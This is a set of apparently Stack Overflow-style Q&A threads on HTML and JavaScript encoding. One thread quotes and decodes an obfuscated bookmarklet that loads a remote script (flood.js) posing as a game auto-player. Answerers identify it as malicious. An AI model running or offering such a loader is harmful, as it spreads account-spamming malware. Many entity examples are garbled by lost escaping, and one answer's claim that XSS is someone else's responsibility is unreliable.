I've see a web page that when I try to view the source, I only see a single JavaScript statement. I searched and could not figure out how they have done that. you can do and see yourself.
The web page is: Weird Page
when I view the source I only see something like below which also looks like a comment:
<script type='text/javascript' language='Javascript'>
<!--document.write(unescape('%3C%2........................
................
How they have done that? How I can change my web page so when someone view the source it look like that?
This article may help to clarify what's happening there.
Basically, this company has encoded their entire page using standard escape characters. If you copy the bit from unencode(...) all the way to the next to last parens, and paste it into your browser console, you'll see the actual HTML content.
If you look at the source code for the page I linked, you'll see the function that converts normal text to all escape characters:
// CONVERTS *ALL* CHARACTERS INTO ESCAPED VERSIONS.
function escapeTxt(os){
var ns='';
var t;
var chr='';
var cc='';
var tn='';
for(i=0;i<256;i++){
tn=i.toString(16);
if(tn.length<2)tn="0"+tn;
cc+=tn;
chr+=unescape('%'+tn);
}
cc=cc.toUpperCase();
os.replace(String.fromCharCode(13)+'',"%13");
for(q=0;q<os.length;q++){
t=os.substr(q,1);
for(i=0;i<chr.length;i++){
if(t==chr.substr(i,1)){
t=t.replace(chr.substr(i,1),"%"+cc.substr(i*2,2));
i=chr.length;
}
}
ns+=t;
}
return ns;
}
What is happening is pretty much what it sounds like. The server is serving a single <script> element, which contains an HTML comment to make it easier for browser that don't support JS (read more here: Why does Javascript ignore single line HTML Comments?), and in the comment it's writing to the document the unescaped version of the string, which is sent escaped.
Related
Take this very simple example HTML:
<html>
<body>This is okay & fine, but the encoding of this link seems wrong.</body>
<html>
On examining document.body.innerHTML (e.g. in the browser's JS console, in JS itself, etc.), this is the value I see:
This is okay & fine, but the encoding of this link seems wrong.
This behaviour is the same across browsers but I can't understand it, it seems wrong.
Specifically, the link in the orginal document is to http://example.com?a=1&b=2, whereas if the value of innerHTML is treated as HTML then it links to http://example.com?a=1&b=2 which is NOT the same (e.g. If I created a new document, which actually had innerHTML as its inner HTML, and I clicked on the link then the browser would be sent to a materially different URL as far as I can see).
(EDIT #3: I'm wrong about the above. Firstly, yes, those two URLs are different; but secondly, the innerHTML which I thought was wrong is right, and it correctly represents the first URL, not the second! See the end of my own answer below.)
This is different from the issue discussed in question innerHTML gives me & as & !. In my case (which is the opposite to the case in that question) the original HTML is correct and it looks to me as if it is the innerHTML which is wrong (i.e. because it is HTML which does not represent what the original HTML represented).
(EDIT #2: I was wrong about this, too: it's not really different. But I think it is not widely known that & is the correct way to represent & inside an href, not just within body text. Once you realise that, then you can see that these are the same issue really.)
Can anyone explain this?
(EDIT #1+4: This only occurred to me a bit late, after writing my original question, but: "is & actually correct within the href text, and & technically incorrect?" As I said when I first wrote those words, that "seems very unlikely! I've certainly never seen HTML written that way." But however 'unlikely', or not, that is the case, and is the main part of what I wasn't understanding!)
Also related and would be useful, can anyone explain how to cleanly get HTML which does correctly represent the target of document links? You definitely can't just un-encode all HTML character references within innerHTML, because (as shown in the example I've used, and also as discussed in innerHTML gives me & as & !) the ones in the main run of text should be encoded, and just un-encoding everything would make these wrong.
I originally thought this was not a duplicate of innerHTML gives me & as & ! (as discussed above; and in a way it still isn't, if it's agreed that it's not as obvious or widely known that the same issues apply inside href as in body text). It's still definitely not a duplicate of A href in innerHTML (which somehwat unclearly asks about how to set innerHTML using JS).
Most browser tools don't show the actual HTML because it wouldn't be of much help:
HTML is often generated dynamically after page load with the help of CSS and JavaScript.
HTML is often broken and the browser needs to repair it in order to generate the memory representation needed for rendering and other stuff.
So the HTML you see is not the actual source but it's generated on the fly from the current status of the document, which of course includes all the fixed applied (in your case, the invalid HTML entities).
The following example hopefully illustrates all the combinations:
const section = document.querySelector("section");
const invalid = document.createElement("p");
invalid.innerHTML = 'Invalid HTML (dynamic)';
const valid = document.createElement("p");
valid.innerHTML = 'Valid HTML (dynamic)';
section.appendChild(valid);
section.appendChild(invalid);
const paragraphs = document.querySelectorAll("p");
for (p of paragraphs) {
console.log(p.innerHTML);
}
const links = document.querySelectorAll("a");
for (a of links) {
console.log(a.getAttribute("href"));
}
<section>
<p>Invalid HTML (static)</p>
<p>Valid HTML (static)</p>
<section>
Is & actually correct within the href text, and & technically incorrect? It seems very unlikely! I've certainly never seen HTML written that way.
There's no such thing as "technically correct", let alone today when HTML is pretty well standardised. (Well, yes, there're two competing standards bodies and specs are continuously evolving, but the basics were set up long ago.)
The & symbol starts a character entity and &b is an invalid character entity. Period.
But it works! Doesn't that mean it's technically correct?
It works because browsers are explicitly designed to deal with completely broken markup, what's known as tag soup, because it was thought that it would ease usage:
<p><strong>Hello, World!</u>
<body><br itspartytime="yeah">
<pink>It works!!!</red>
But HTML entities are just an encoding artefact. That doesn't mean that URLs are not allowed to contain literal ampersands, it just means that —when in HTML context— they need to be represented as &. It's the same as when you type a backslash in a JavaScript string to escape some quotes: the backslash does not become part of your data.
Having thought up a possible (but I thought 'unlikely') explanation - which I put in as an edit in the original question - I've realised that it is the answer:
Using & to represent & inside an href is technically incorrect, and & is technically correct
I gathered this initially from this SO answer https://stackoverflow.com/a/16168585/795690, and I think it is relevant that (as it also says in that answer) the idea that & is the correct way to represent & in an href is not as widely understood as the idea that & is the correct way to represent & in body text.
Once you do understand this, it makes sense that what the browser is doing is right, and that the innerHTML value which comes back represents the link correctly.
EDIT:
#ÁlvaroGonzález gives a much longer answer, and it took me a while to see how everything he says applies, so I thought I'd try to explain what I didn't understand starting from where I started from, in case it helps someone else!
If you start with raw HTML with <a href="http://example.com/?a=1&b=1"> and then you inspect the DOM in the browser, or look at the value of the href attribute in JS then you see "http://example.com/?a=1&b=1" everywhere. So it looks as if nothing has changed, and nothing was wrong. What I didn't understand is that actually the browser has parsed a technically incorrect href (with invalid entities) to be able to display this to you! (Yes, LOTS of people use this 'broken' format!)
To see this first hand, load this longer HTML example into your browser:
<html>
<body style="font-family: sans-serif">
<p>Now & then http://example.com/?a=1&b=2</p>
<p>Now & then http://example.com/?a=1&b=2</p>
<p>Now & then http://example.com/?a=1&b=2</p>
</body>
</html>
then in your javascript console try running this code taken from #ÁlvaroGonzález's answer:
const paragraphs = document.querySelectorAll("p");
for (p of paragraphs) {
console.log(p.innerHTML);
}
const links = document.querySelectorAll("a");
for (a of links) {
console.log(a.getAttribute("href"));
}
Also try clicking on the links to see where they go.
Once you've made sense of everything that you see there, it is no longer surprising how innerHTML works!
Given an arbitrary customer input in a web form for a URL, I want to generate a new HTML document containing that URL within an href. My question is how am I supposed to protect that URL within my HTML.
What should be rendered into the HTML for the following URLs that are entered by an unknown end user:
http://example.com/?file=some_19%affordable.txt
http://example.com/url?source=web&last="f o o"&bar=<
https://www.google.com/url?source=web&sqi=2&url=https%3A%2F%2Ftwitter.com%2F%3Flang%3Den&last=%22foo%22
If we assume that the URLs are already uri-encoded, which I think is reasonable if they are copying it from a URL bar, then simply passing it to attr() produces a valid URL and document that passes the Nu HTML checker at validator.w3.org/nu.
To see it in action, we set up a JS fiddle at https://jsfiddle.net/kamelkev/w8ygpcsz/2/ where replacing the URLs in there with the examples above can show what is happening.
For future reference, this consists of an HTML snippet
<a>My Link</a>
and this JS:
$(document).ready(function() {
$('a').attr('href', 'http://example.com/request.html?data=>');
$('a').attr('href2', 'http://example.com/request.html?data=<');
alert($('a').get(0).outerHTML);
});
So with URL 1, it is not possible to tell if it is URI encoded or not by looking at it mechanically. You can surmise based on your human knowledge that it is not, and is referring to a file named some_19%affordable.txt. When run through the fiddle, it produces
My Link
Which passes the HTML5 validator no problem. It likely is not what the user intended though.
The second URL is clearly not URI encoded. The question becomes what is the right thing to put into the HTML to prevent HTML parsing problems.
Running it thru the fiddle, Safari 10 produces this:
My Link
and pretty much every other browser produces this:
My Link
Neither of these passes the validator. Three complaints are possible: the literal double quote (from un-escaping HTML), the spaces, or the trailing < character (also from un-escaping HTML). It just shows you the first of these it finds. This is clearly not valid HTML.
Two ways to try to fix this are a) html-escape the URL before giving it to attr(). This however results in every & becoming & and the entities such as & and < become double-escaped by attr(), and the URL in the document is entirely inaccurate. It looks like this:
My Link
The other is to URI-encode it before passing to attr(), which does result in a proper validating URL which actually clicks to the intended destination. It looks like this:
My Link
Finally, for the third URL, which is properly URI encoded, the proper HTML that validates does come out.
My Link
and it does what the user would expect to happen when clicked.
Based on this, the algorithm should be:
if url is encoded then
pass as-is to attr()
else
pass encodeURI(url) to attr()
however, the "is encoded" test seems to be impossible to detect in the affirmative based on these two prior discussions (indeed, see example URL 1):
How to find out if string has already been URL encoded?
How to know if a URL is decoded/encoded?
If we bypass the attr() method and forcibly insert the HTML-escaped version of example URL 2 into the document structure, it would look like this:
My Link
Which seemingly looks like valid HTML, yet fails the HTML5 validator because it unescapes to have invalid URL characters. The browsers, however, don't seem to mind it. Unfortunately, if you do any other manipulation of the object, the browser will re-escape all the &'s anyway.
As you can see, this is all very confusing. This is the first time we're using the browser itself to generate the HTML, and we are not sure if we are getting it right. Previously, we did it server side using templates, and only did the HTML-escape filter.
What is the right way to safely and accurately insert user-provided
URL data into an HTML5 document (using JavaScript)?
If you can assume the URL is either encoded or not encoded, you may be able to get away with something along the lines of this. Try to decode the URL, treat an error as the URL not being encoded and you should be left with a decoded URL.
<script>
var inputurl = 'http://example.com/?file=some_19%affordable.txt';
var myurl;
try {
myurl = decodeURI(inputurl);
}
catch(error) {
myurl = inputurl;
}
console.log(myurl);
</script>
I have in my views some code as this
$(".someclass").hover(function(){
$(this).append("#{render "layouts/show_some_file", title: "some_file"}");
});
The show_some_file.html.haml file consists of two nested basic divs
In my browser, I get
$(".someclass").hover(function(){
$(this).append("<div>
<div>some text</div>
</div>
");
});
On hover, I get in my chrome console SyntaxError: Unexpected token ILLEGAL. I deleted my white spaces in my console, and it worked. But how to clean the white spaces in my ruby rendering ?
I am not entirely certain it will help, but you probably should use the "<%= render ... %>" variant rather than the #{}
And since it's for javascript, the correct way would be "<%= escape_javascript(render ...) %>"
If using HAML, substitute the ERB for however the markup is written there.
Edit: might be
!= "$(this).append("#{escape_javascript(render "layouts/show_some_file", title: "some_file")}");"
Since the result of your {#render} is HTML, and although you might use it once, it might make more sense to store it in HTML, and retrieve it with JavaScript. Mimicking templating, here's an example of what I mean:
<script id="my_render" type="text/template">
#{render "layouts/show_some_file", title: "some_file"}
</script>
<script type="text/javascript">
$(document).ready(function () {
var render_content = $("#my_render").html();
$(".someclass").hover(function () {
$(this).append(render_content);
});
});
</script>
It kind of acts like a template. You use a script tag, but you set its type to something that doesn't cause it to be executed. Since script tags are never visible on a page, you would never have visual problems...unlike doing this inside of a div...the HTML is then "separate" from the rest of the page.
I'm sure there's a better solution using Ruby, but if you're outputting a partial view to JavaScript code, I'd have to ask why. It makes more sense to me to put in a "template". I understand this doesn't directly answer your immediate question, but it's an alternative :)
In fact, I got it, one of the right thing to do is :
$("someclass").hover(function(){
$(this).append("#{escape_javascript render "layouts/show_some_file", title: "some title"}");
});
The obvious thing to do is edit layouts/show_some_file & remove white space. It's not really whitespace that's the problem, but carriage returns. Javascript doesn't like multi-line strings. If I knew Ruby, I could probably write a regex that gets rid off stuff like "\r\n", which is carriage return line feed in PHP/C syntax.
i found it in a forum that tell me that this code would give me auto play for facebook games but i afraid that this is not what they say, im afraid that this is malicious script
please help :)
javascript:var _0x8dd5=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x8dd5[2]](_0x8dd5[1]))[_0x8dd5[0]]=_0x8dd5[3];b[_0x8dd5[5]][_0x8dd5[4]](a); void (0);
Let's start by decoding the escape sequences, and get rid of that _0x8dd5 variable name:
var x=[
"src","script","createElement","http://ug-radio.co.cc/flood.js",
"appendChild","body"
];
(a=(b=document)[x[2]](x[1]))[x[0]]=x[3];
b[x[5]][x[4]](a);
void (0);
Substituting the string from the array, you are left with:
(a=(b=document)["createElement"]("script"))["src"]="http://ug-radio.co.cc/flood.js";
b["body"]["appendChild"](a);
void (0);
So, what the script does is simply:
a = document.createElement("script");
a.src = "http://ug-radio.co.cc/flood.js";
document.body.appendChild(a);
void (0);
I.e. it loads the Javascript http://ug-radio.co.cc/flood.js in the page.
Looking at the script in the file that is loaded, it calls itself "Wallflood By X-Cisadane". It seems to get a list of your friends and post a message to (or perhaps from) all of them.
Certainly nothing to do with auto play for games.
I opened firebug, and pasted part of the script into the console (being careful to only paste the part that created a variable, rather than running code). This is what I got:
what I pasted:
console.log(["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"]);
the result:
["src", "script", "cx7 2eateElement", "x 68ttp://ug-rad io.co.cc/flox 6Fd.js", "appendC x68ild", "body"]
In short, what this looks like is script to load an external Javascript file from a remote server with a very dodgy looking domain name.
There are a few characters which are not converted quite to what you'd expect. This could be typos (unlikely) or deliberate further obfuscation, to fool any automated malware checker looking for scripts containing URLs or references to createElement, etc. The remainder of the script patches those characters back into place individually before running it.
The variable name _0x8dd5 is chosen to look like hex code and make the whole thing harder to read, but in fact it's just a regular Javascript variable name. It is referenced repeatedly in the rest of the script as it copies characters from one part of the string to another to fix the deliberate gaps.
Definitely a malicious script.
I recommend burning it immediately! ;-)
Well, the declared var is actually this:
var _0x8dd5= [
'src', 'script', 'cx7 2eateElement',
'x 68ttp://ug-rad io.co.cc/flox 6Fd.js', 'appendC x68ild', 'body'
];
The rest is simple to figure out.
Well your first statement is setting up an array with roughly the following contents:
var _0x8dd5 = ["src", "script", "createElement", "http://ug-radio.co.cc/flood.js", "appendChild", "body"];
I say "roughly" because I'm using Chrome's JavaScript console to parse the data, and some things seem to be a bit garbled. I've cleaned up the garbled portions as best as I can.
The rest appears to be calling something along the lines of:
var b = document;
var a = b.createElement("script");
a.src = "http://ug-radio.co.cc/flood.js";
b.body.appendChild(a);
So basically, it is adding a (probably malicious) script to the document.
You most probably know how to decode this or how it was encoded, but for those that aren't sure, it is nothing but 2-digit hexadecimal escape sequence. It could also be 4 digit one using \udddd (eg. "\u0032" is "2") or \ddd for octal.
Decoding hex string in javascript
I have a script that is rendered to an html page as a part of a tracking solution (etracker).
It is something like this:
<script>
var et_cart= 'nice shoes,10.0,100045;nice jacket,20.00,29887';
</script>
This will be transmitted to the server of the tracking solution by some javascript that I don't control. It will end up as 2 items. The items are separated by a semicolon in the source (after '100045').
I obviously need to Html-encode and Javascript-encode the values that will be rendered.
I first Html-encode and after that remove single quotes.
This works, but I have an issue with special characters in french and german e.g. umlaut (ü, ä...).
They render something like {. The output of the script when using lars ümlaut as the article is:
<script>
var et_cart= 'lars {mlaut,10.0,100045;nice jacket,20.00,29887';
</script>
The semicolon is evaluated as an item separator by the tracking solution.
The support of the tracking solution told me to url-encode the values. Can this work?
I guess URL-encoding doesn't stop any xss-atacks. Is it ok to first url-encode and html-encode, then javascript-encode after it?
The values only need to be URL encoded to transmit to the client. If the information is being displayed by the client it's their responsibility to ensure they are protecting themselves against xss attacks, not yours.
<script>
var et_cart= 'lars+%FCmlaut%2C10.0%2C100045%3Bnice+jacket%2C20.00%2C29887';
</script>